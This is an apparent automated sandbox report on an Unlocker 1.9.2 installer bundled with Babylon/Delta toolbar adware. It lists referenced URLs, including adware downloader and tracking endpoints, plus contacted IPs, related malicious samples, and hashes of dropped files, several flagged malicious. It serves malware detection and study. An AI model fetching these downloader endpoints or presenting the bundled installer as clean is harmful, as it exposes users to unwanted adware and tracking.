                                                                                                                    http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471tmlSetup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://cs-g2-crl.thawte.com/ThawteCSG2.crl0DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drfalse
                                                                                                                      high
                                                                                                                      http://crl.thawte.com/ThawteTimestampingCA.crl0DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drfalse
                                                                                                                        high
                                                                                                                        http://unlocker.emptyloop.com/ThisUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                                          high
                                                                                                                          http://unlocker.emptyloop.com/AcestUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                                            high
                                                                                                                            http://unlocker.emptyloop.com/QuestoUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                                              high
                                                                                                                              http://unlocker.emptyloop.com/DenegadoUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                                                high
                                                                                                                                http://www.babylon.com/redirects/redir.cgi?type=getting_started&lang=$DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                                                                  high
                                                                                                                                  http://unlocker.emptyloop.com/DenneUnlocker.exe.0.drfalse
                                                                                                                                    high
                                                                                                                                    http://utils.babylon.com/country/S7Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://info.delta-search.com/uninstall/eula.htmlUnlocker1.9.2.exe, 00000000.00000003.324401251.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323738721.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.338245646.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324831315.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.338510112.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.308680895.0000000002802000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324623938.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.308576308.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324810011.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324676511.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323660650.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373598163.000000000019A000.00000004.00000010.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324650821.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324760209.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324786487.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 
Unlocker1.9.2.exe, 00000000.00000003.324593121.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323709911.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323362656.00000000028E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://unlocker.emptyloop.com/OdmUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000002.00000002.361089994.00000000037B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&afSetup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmp, log_file.txt.2.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://info.babylon.com/campaigns/RMSetup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://stp.babylon.com/downloader.php?&lang=&zpb=1&second=1&geo=1about:blank:about:blankbfrNvgt:DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drfalse
                                                                                                                                                high
                                                                                                                                                http://www.babylon.com/redirects/redir.cgi?type=post_install_page&lang=$DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.babylon.com/redirects/redir.cgi?type=babylon6_full_textDeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360676354.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358228779.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 
00000002.00000003.358133429.000000000238C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://ocsp.thawte.com0DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.my-online-search.comhttp://www.my-online-search.com/?babsrc=HP_ofln&mntrId=&dlb=%dhome&?/DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://tcm.babylon.com/UM_Consumer/UMOpeartionsSetup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://bis.babylon.com/DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://unlocker.emptyloop.com/)Unlocker.exe.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://dl.babylon.com/site/files/Setup9/dwr/DefaultClient/DefaultClient/Default-clientdat.zpb;http:/Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
184.154.27.232 | stp.babylon-services.com | United States | 32475 | SINGLEHOP-LLCUS | false
198.143.175.67 | dl.babylon-services.com | United States | 32475 | SINGLEHOP-LLCUS | false
                                                                                                                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                            Analysis ID:810721
                                                                                                                                                            Start date and time:2023-02-17 13:05:44 +01:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 7m 51s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes:11
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Sample file name:Unlocker1.9.2.exe
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal48.spyw.evad.winEXE@15/56@3/2
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 44.7% (good quality ratio 43.5%)
                                                                                                                                                            • Quality average: 81%
                                                                                                                                                            • Quality standard deviation: 22%
                                                                                                                                                            HCA Information:Failed
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                            • Stop behavior analysis, all processes terminated
                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
184.154.27.232 | http://stat.info-stream.net/report.php | malicious | | stat.info-stream.net/favicon.ico
198.143.175.67 | DeltaTB.exe | malicious | Unknown | dl.babylon.com/site/files/Setup9/dwr/DSeachLink/DSearchLink.zpb

Match | Associated Sample Name / URL | Detection | Threat Name | Context
stat.babylon-services.com | IBXFrJydru.exe | malicious | Unknown | 184.154.27.232
stat.babylon-services.com | DeltaTB.exe | malicious | Unknown | 184.154.27.232
stat.babylon-services.com | http://stat.info-stream.net/report.php | malicious | | 184.154.27.232
dl.babylon-services.com | SecuriteInfo.com.Adware.Babylon.15.13567.exe | malicious | Unknown | 198.143.175.67
dl.babylon-services.com | DeltaTB.exe | malicious | Unknown | 198.143.175.67
stp.babylon-services.com | Babylon9_setup.exe | malicious | Unknown | 184.154.27.232
stp.babylon-services.com | IBXFrJydru.exe | malicious | Unknown | 184.154.27.232
stp.babylon-services.com | SecuriteInfo.com.Adware.Babylon.15.13567.exe | malicious | Unknown | 184.154.27.232
stp.babylon-services.com | DeltaTB.exe | malicious | Unknown | 184.154.27.232
stp.babylon-services.com | cf9f3c05-00c9-4008-846e-7d9a88232305.exe | malicious | Unknown | 184.154.27.232
                                                                                                                                                            PO 1987009.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 95.172.86.31
                                                                                                                                                            HSBC Payment Advice.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 69.175.85.162
                                                                                                                                                            Remmitance copy.shtml.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 108.178.38.98
                                                                                                                                                            Hesaphareketi-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 184.154.47.42
                                                                                                                                                            HSBC Payment Advice.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 69.175.85.162
                                                                                                                                                            WKPSNTQR90002023.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 69.175.85.162
                                                                                                                                                            abc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 69.175.85.162
                                                                                                                                                            HSBC bank Payment copy.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 95.172.86.31
                                                                                                                                                            deWmHJb3Gy.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 107.6.134.206
                                                                                                                                                            https://securedadvantage.com/nze/r/m69EuNQGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 198.20.90.34
                                                                                                                                                            http://www.leeannchin.comGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 65.60.57.163
                                                                                                                                                            PO 18888.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 95.172.86.31
                                                                                                                                                            Employees 2023 Pay Amendments.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 108.163.227.58
                                                                                                                                                            http://tiktok.ace2.us/gzp8FJTGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 99.198.108.194
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1689
                                                                                                                                                            Entropy (8bit):4.70951895283198
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:bQOdZha0FcSV1TRyr005QmiLB3pmNv+kFEwRywEuwChXthNl8krzcLd2ULt:Dxe41TkzH0mNBjAn3qZ2krzSDLt
                                                                                                                                                            MD5:F3B322AADB14E1B2BA9BF38972DC216C
                                                                                                                                                            SHA1:4564F088EC683F8A89894B8158A79D358693BBA8
                                                                                                                                                            SHA-256:B604FA4D14829D2D5B55F94D9B7298417ACD0949E4F4C1483A4411BC4968AFAC
                                                                                                                                                            SHA-512:9A8E5D36328A796FED7D07E82E45F001EC5891B01B54B47D20D90B6A982D1B8240F9EAB3EDDE7F5D271B3667F54D0AAEF4B21C9D1E50B265E70B3E65EE37573C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Unlocker for Windows 2000, XP, 2003, Vista and 7 both 32 and 64 bits...Copyright (C) 2005-2011 Cedrick Collomb / Empty Loop..unlocker.emptyloop.com....Using Unlocker..--------------....How often have you tried to delete or rename a file or folder and got.."Cannot delete xxx: It is being used by another person or program." ?....Unlocker is a tool which will help you overcoming this scandalous Windows..bug.....Simply right click the file or folder and select Unlocker. If the file..or folder is locked then a window will appear with a list of processes..locking the file or folder. Select the locks and click Unlock and you ..are done.....It is recommended to Unlock wisely and to close open processes locking..files or folder if any, but if only Explorer.exe is the culprit, do not..hesitate! :D....Terms of Use..------------....This software is provided "as is", without any guarantee made..as to its suitability or fitness for any particular use. It may..contain bugs, so use of this tool is at
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):124928
                                                                                                                                                            Entropy (8bit):6.117157328512671
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:QjL8UYqusRZHN+R6iJBf232Qxl1D5ljFerDUF7TGMvB+xpgGfGlbPMcpEkAEAG+L://sRZt+R6+232QLADzMvYonfgQ/Y39
                                                                                                                                                            MD5:0A77F732624155A215F5CA54DF9B2930
                                                                                                                                                            SHA1:172BDF71343DD6544CFBE04ABBC3DEC4535F7D84
                                                                                                                                                            SHA-256:A0B651038C4301F70E4AEA506EB90EDC584A5C4CA46880C7DC2AE5EAFA6DC506
                                                                                                                                                            SHA-512:6482C9FC3B5FF9D5798DEB9965B4DFAB9BA62B889E921011696F29DD96B813194A59F76A52A88FA4962317C6A43A21122C857E4CA80C6C4360C2CEE544117352
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<http://unlocker.emptyloop.com/>), ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):56
                                                                                                                                                            Entropy (8bit):4.431719878492293
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:HRAbABGQYm/2oWtV6JnRyn:HRYFVm/Xo6yn
                                                                                                                                                            MD5:2043E152CBAA21E30B53B6D6C50CD780
                                                                                                                                                            SHA1:544AA2ADF641B1D7330DB20D268308BD9F680917
                                                                                                                                                            SHA-256:2253C9CEB715D173ABAE90D4836A6A506E6049FEF0FC98D1649AB57ED94707AC
                                                                                                                                                            SHA-512:865249F3979BF76C26E1455AEFC3E4B92D0B8259398D068066D3F3B9EF945EE0A78BB7616638092C120337F348A063A22A16857CC86B7450FFE55FDF5638189A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[InternetShortcut]..URL=http://unlocker.emptyloop.com/..
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20032
                                                                                                                                                            Entropy (8bit):6.120916226027237
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:b0cviyVcgoH1a3FveCAmbtQ/o8DhQLMwdYJLygbPbCQW1M6jjDAa:b03nTHsFv+/oih5FLfbCPMmjl
                                                                                                                                                            MD5:5FE324D6C1DC481136742AB5FB8F6672
                                                                                                                                                            SHA1:02F2D4476006CECD771DE3CBE247E432950AE916
                                                                                                                                                            SHA-256:0A66B19BB38385A8879633DCE1272B8ACF1B4B264C88E254345EC249335B41B1
                                                                                                                                                            SHA-512:FAA76477503923D1C14A12F00D7D416E5FBB485560EA02ED1E6EF6337F9AD88BC612AF241EA61C8F9003253CCF5F66B2C7CE4A508BB2ADC761C4F36AC345195D
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12352
                                                                                                                                                            Entropy (8bit):6.464105601913163
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:dqD9l0Hvj1+z7PcFVyowJL/W6Mgb5+ebCfYEQpkqs1I5Zgjl50Xe:60HvozjeVYJLygbPbCQW1M6jYXe
                                                                                                                                                            MD5:9DC07E73A4ABB9ACF692113B36A5009F
                                                                                                                                                            SHA1:0C45B0FA0718E5ABA0F21F14178597A1ED3FC208
                                                                                                                                                            SHA-256:CA7176FC219515D58DCFA66EC61880ECE5617275C9B83701BB74D8B60E733D34
                                                                                                                                                            SHA-512:7BB2F07DF990689933B344D2E3061A5E1324ABA011E703130379ED24B253BDD464C9D26B8EFE2D86523F241236FF1B7EDB02919801850BB749849215B1FABF57
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11840
                                                                                                                                                            Entropy (8bit):6.714063708551743
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:kpjAiTRs0TjebH947yowJL/W6Mgb5+ebCfYEQpkqs1I5Zgjl5w:kWIsUgHqYJLygbPbCQW1M6jk
                                                                                                                                                            MD5:5B964DBCC99EDEE45A6F235417713A93
                                                                                                                                                            SHA1:E65BB79A470A509A50B4C275C10BC10892AB11CA
                                                                                                                                                            SHA-256:3B1AFEA2711E5D731A60B41E87F4711FE1DB3345FA316BE20347376068479DD5
                                                                                                                                                            SHA-512:60DD41E0434FCC7D6D57A02D69CD47C2B74C9C18316F59AEE88DA087C22C3E8408AA94AB9738EDC1B229DB8F83E620354394AE3847E216C2BCE33DC0D3E62743
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):98302
                                                                                                                                                            Entropy (8bit):6.9288137123184175
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:LLXB65939tY6HBg4sXJH3VRRYia6S+0hyc1tb/ny+ti8wgdK8gM6srLnV+:LLk395hYXJy+Hetb/nsZh8gMJn4
                                                                                                                                                            MD5:CBC4DC3DC6588687641D7FFD626A0156
                                                                                                                                                            SHA1:3BEF23915D9469FD93BDC6DF447DD596D01F233D
                                                                                                                                                            SHA-256:DA85CD2439827EDF0C06E9B5F6780182F50DADB6608512BA86989F6905C5F6D8
                                                                                                                                                            SHA-512:6E0A86A35C6B46BEE9E0D5A1796A360BDF0DB1B79CCB9BCB8F18631EC500350F245C2E11E38C5EA4BE3846017CBFE725FC643F3FAD14695FCD683026D3C5B3C6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3844
                                                                                                                                                            Entropy (8bit):7.9473327809209735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:JoZggOWDGmubGYXwfR1ZCeeIV7Bwbuq44oP:yy3WFYXwNneEIA3
                                                                                                                                                            MD5:5E6230B3B16798E23720958756AC6D9E
                                                                                                                                                            SHA1:C7BCB001C48A67D4C9D6E70E92473EBD85B30585
                                                                                                                                                            SHA-256:D49EC47F5D27A09A17E00A6EB78F49A761C9F5881EC81FB07CC49FD0A5F287B2
                                                                                                                                                            SHA-512:6B1C132F0E4FC2CA6B5E8D807671C586D84E044E4DB8380682FD4D071160177C0F7E7A6AFAE3EE74A4FBD5C65ACA0C0876948F5A42DEAFDBB685C5B7989B5AAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):274
                                                                                                                                                            Entropy (8bit):5.925546659669212
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:T3C1NyQx7MwvJ043t3wuqzHBa9j4CaJaoQ3yvZR+n:j8x7QAt3JwhWaQCvv+
                                                                                                                                                            MD5:66AC3BAE1AF259D143B7E5B7ED33FCBA
                                                                                                                                                            SHA1:0DBA3F19AA54AFECEEDE904E9CCB9ACBAA7C8CD0
                                                                                                                                                            SHA-256:39192ECB5ED65522CFE1FBFDEF832648036634B856B4A036876746E28E852DF6
                                                                                                                                                            SHA-512:73187D11A31604D3478772B5DA23310D927FAFC5A9EBA44B925B9ADD44B7E56FE05702C6C2888C2D14BAC8CB155BFBE89634562D2DAAA28083CCF1F19FE34E3D
